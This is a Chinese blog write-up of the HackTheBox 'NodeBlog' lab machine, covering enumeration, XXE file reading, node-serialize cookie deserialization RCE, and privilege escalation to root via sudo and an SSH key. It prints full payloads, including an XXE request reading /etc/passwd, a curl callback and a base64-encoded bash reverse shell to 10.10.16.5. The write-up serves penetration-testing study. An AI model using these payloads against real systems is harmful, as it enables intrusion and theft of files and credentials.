HackTheBox | NodeBlog

最新推荐文章于 2024-07-07 06:20:56 发布
最新推荐文章于 2024-07-07 06:20:56 发布
阅读量180 收藏
点赞数
分类专栏: htb记录 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Purpose_7/article/details/128656195
版权

HackTheBox | NodeBlog

nmap扫描,开启22、5000,其中5000端口的web服务使用node.js开发

image-20230111155456699

访问Web服务

image-20230111155556389

存在登录页面

image-20230111160049345

sqlmap跑一下,没有发现注入点

image-20230111161908078

dirsearch扫描,也只有login页面

image-20230111161938921

尝试手动信息收集,发现存在articles路径

image-20230111162003920

再用dirsearch对articles路径扫描一下,扫到了/articles/new/articles/test两个路径

image-20230111162930327

new页面用于创建新文章

image-20230111163037929

image-20230111163126890

test页面是已经创建好的test文章

image-20230111163111456

回到主页面,检查源代码,看到了js代码,对/articles/xml进行了请求

image-20230111163430189

POST请求访问该页面,看到返回信息中要求了格式

image-20230111163651928

尝试POST内容,还是格式不对

image-20230111171052726

构造一个标准的文件上传请求包,看到发送的XML内容被写入文本框中

POST /articles/xml HTTP/1.1
Host: 10.10.11.139:5000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
If-None-Match: W/"d8a-Q5hbhgQT0KLPhY8od1GY18/i7BA"
Content-Type: multipart/form-data; boundary=---------------------------34916364483540329092468948094
Content-Length: 379

-----------------------------34916364483540329092468948094
Content-Disposition: form-data; name="file"; filename="123.xml"
Content-Type: text/xml

<?xml version="1.0" encoding="utf-8"?> 
<post><title>Example Post</title><description>Example Description</description><markdown>Example Markdown</markdown></post>

-----------------------------34916364483540329092468948094--

image-20230111173653689

进行XXE文件读取

POST /articles/xml HTTP/1.1
Host: 10.10.11.139:5000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
If-None-Match: W/"d8a-Q5hbhgQT0KLPhY8od1GY18/i7BA"
Content-Type: multipart/form-data; boundary=---------------------------34916364483540329092468948094
Content-Length: 433

-----------------------------34916364483540329092468948094
Content-Disposition: form-data; name="file"; filename="123.xml"
Content-Type: text/xml

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE xxe [ 
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]> 
<post><title>Example Post</title><description>Example Description</description><markdown>&xxe;</markdown></post>

-----------------------------34916364483540329092468948094--

image-20230111174239756

看到用户admin

image-20230111174312769

之前访问错误的时候回显报错时得到一些路径

image-20230111174740703

读取server.js的源码

image-20230111175240367

const express = require('express')
const mongoose = require('mongoose')
const Article = require('./models/article')
const articleRouter = require('./routes/articles')
const loginRouter = require('./routes/login')
const serialize = require('node-serialize')
const methodOverride = require('method-override')
const fileUpload = require('express-fileupload')
const cookieParser = require('cookie-parser');
const crypto = require('crypto')
const cookie_secret = "UHC-SecretCookie"
//var session = require('express-session');
const app = express()

mongoose.connect('mongodb://localhost/blog')

app.set('view engine', 'ejs')
app.use(express.urlencoded({ extended: false }))
app.use(methodOverride('_method'))
app.use(fileUpload())
app.use(express.json());
app.use(cookieParser());
//app.use(session({secret: "UHC-SecretKey-123"}));

function authenticated(c) {
    if (typeof c == 'undefined')
        return false

    c = serialize.unserialize(c)

    if (c.sign == (crypto.createHash('md5').update(cookie_secret + c.user).digest('hex')) ){
        return true
    } else {
        return false
    }
}


app.get('/', async (req, res) => {
    const articles = await Article.find().sort({
        createdAt: 'desc'
    })
    res.render('articles/index', { articles: articles, ip: req.socket.remoteAddress, authenticated: authenticated(req.cookies.auth) })
})

app.use('/articles', articleRouter)
app.use('/login', loginRouter)


app.listen(5000)

看到对参数c进行了反序列化操作。在get()中看到c其实就是请求中cookie字段的auth值。

查找之后node-serialize应该是node的一个标准模块,参考https://paper.seebug.org/213/生成反序列化payload

var y={
        rce:function(){
                require('child_process').exec('ls /', function(error, stdout, stderr){console.log(stdout)});
        },
}
var serialize = require('node-serialize');
console.log("Serialized: \n" + serialize.serialize(y));

image-20230112102106887

由于需要调用反序列化函数,所以需要使用到(),最后得到的payload如下:

{"rce":"_$$ND_FUNC$$_function(){\r\nrequire('child_process').exec('ls /', function(error, stdout, stderr){console.log(stdout)});}()"}

将其添加到HTTP请求的Cookie字段,此时是尝试读取文件列表,但是没有成功

image-20230112102331708

尝试curl本地,发现成功,所以应该是无回显RCE

{"rce":"_$$ND_FUNC$$_function(){require('child_process').exec('curl 10.10.16.5:1234', function(error, stdout, stderr){console.log(stdout)});}()"}

image-20230112103546130

那么就修改payload反弹shell

{"rce":"_$$ND_FUNC$$_function(){require('child_process').exec('echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi41LzEyMzQgMD4mMQ==|base64 -d|bash -i', function(error, stdout, stderr){console.log(stdout)});}()"}

拿到之前看到的admin用户的权限

image-20230112103810927

进入/home/admin目录时提示无权限

image-20230112105545923

上传linenum.sh和linpeas.sh进行信息收集,但是没有看到有效信息

手动信息收集,当前主机开放了mongodb,进入node的web服务看看能不能找到一些密码。

/opt/blog/routes/login.js找到admin的密码admin/IppsecSaysPleaseSubscribe

image-20230112105650977

尝试ssh登录,发现只允许公钥

image-20230112105759343

sudo -l检查sudo权限

image-20230112105845943

发现可以读取/home/admin目录下的文件,但是没法进入该目录,提示没有cd命令,应该是做了权限限制

同样也可以sudo读取root用户的文件

image-20230112110244683

既然可以操作/root用户的文件,就想到可以写公钥进去

但是在写的过程中发现无法直接写入authorized_keys,会提示权限不足

尝试先在其他目录创建一个authorized_keys文件,然后移动到/root/.ssh目录下,再将文件的属主、属组修改为root,将文件权限修改为600,此时就可以利用SSH公钥登录root用户。

image-20230112111500690

image-20230112111517624

本地SSH登录

image-20230112111202804

xxL7-
关注
专栏目录
HackTheBox | Driver
Purpose_7的博客
10-11 754
HackTheBox | Driver
HackTheBox | Horizontall
Purpose_7的博客
08-08 959
HackTheBox Horizontall
HackTheBox】 meow
开心星人的博客
06-23 874
选择tcp,稳定一点然后下载starting_point_HappyCoder.ovpn复制到kali中去切换root用户使用命令 到这样就是可以了再打开一个terminal 看到了我们的tun0隧道已经建立好了 ping下这台主机,是可以ping通的 1、缩写VM代表着什么 Virtual Machine2、我们使用什么工具和操作系统进行交互为了通过命令行执行命令,例如启动我们的VPN连接,它也被称作控制台或shell terminal(终端)3、我们使用什么服务形成我们的VPN连接进入我们
Hack The Box -- Blazorized
qq_22792465的博客
07-06 1491
http://blazorized.htb/_framework/blazor.webassembly.js 中存在一些json文件,min.js中是编码文件并没有找到其他路径。没见过的直接给度娘+gpt,既然是基于Blazor框架那就搜一搜Blazor的信息。
Hackthebox系列 LoveTok
xujing19920814的博客
10-23 760
Hackthebox系列 LoveTok
Hack The Box-Mailing
m0_52742680的博客
05-06 2851
HackTheBox S5赛季靶场第三篇
Hack The Box-Runner
m0_52742680的博客
04-22 1640
HackTheBox S5赛季靶场第一篇
Hack The Box-Editorial
m0_52742680的博客
06-17 1964
HackTheBox S5赛季靶场第九篇
HackTheBox--Editorial
七天
07-07 921
Editorial 测试过程。
Hack The Box-BoardLight
m0_52742680的博客
05-27 2346
HackTheBox S5赛季靶场第六篇
hackthebox注册教程
01-20
官方网址:https://www.hackthebox.eu/ hackthebox是一个靶场,听说和vulnhub很像,最近迷上了做靶场,于是就像去hackthebox看看,发现还是注册,而且注册好像还没有那么简单 在首页的最下面有个join,进行点击 发现...
Hack the box的Easy难度比较有价值的靶机.rar
11-04
"Hack the Box"(HTB)是一个在线平台,提供各种虚拟靶机,让安全专家和爱好者通过模拟真实世界的攻击场景来提升自己的技能。这个“Easy”难度级别的靶机是为初学者设计的,旨在帮助他们入门渗透测试的基础知识。 ...
HackTheBox靶机系列之困难Reel
04-09
HackTheBox靶机系列之困难Reel 本篇文章主要介绍了Reel靶机的整个利用过程,从侦察到提权,涵盖了渗透测试、漏洞利用、信息收集等多个方面的知识点。 侦察阶段 在Reel靶机中,我们首先进行了侦察,扫描了21、22、...
Stego-Challenges-HackTheBox-Write-Ups:Hack The Box带来的Stego挑战| Walkthoughs写ups
03-21
在IT安全领域,尤其是黑客挑战平台如Hack The Box(HTB)中,"Stego"是一种常见的挑战类型,它涉及到隐藏信息的技术,通常被称为隐写术。隐写术是一种利用图像、音频、文本等载体秘密传输信息的方法。在这个特定的...
hackthebox:hackthebox.eu工作库
03-10
所有练习和包装盒。 欣赏:3 在CWD中工作,并在flag/标记(奖赏)。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8471
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
rossmann_sales_prediction.ipynb
09-26
rossmann_sales_prediction.ipynb
基于java的智慧社区设计与实现开题报告.docx
09-26
基于java的智慧社区设计与实现开题报告.docx
基于SuperAGI 专注中文领域的大模型AI应用框架.zip
最新发布
09-26
基于SuperAGI 专注中文领域的大模型AI应用框架.zip
Hack The Box:File Inclusion 漏洞深度剖析与实战解析
"这篇文档是关于Hack The Box平台上的File Inclusion漏洞利用的实战教程,主要涉及了Local File Inclusion(LFI)的概念、原因以及如何进行漏洞探测和利用。" 在网络安全领域,Local File Inclusion(LFI)是一种...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值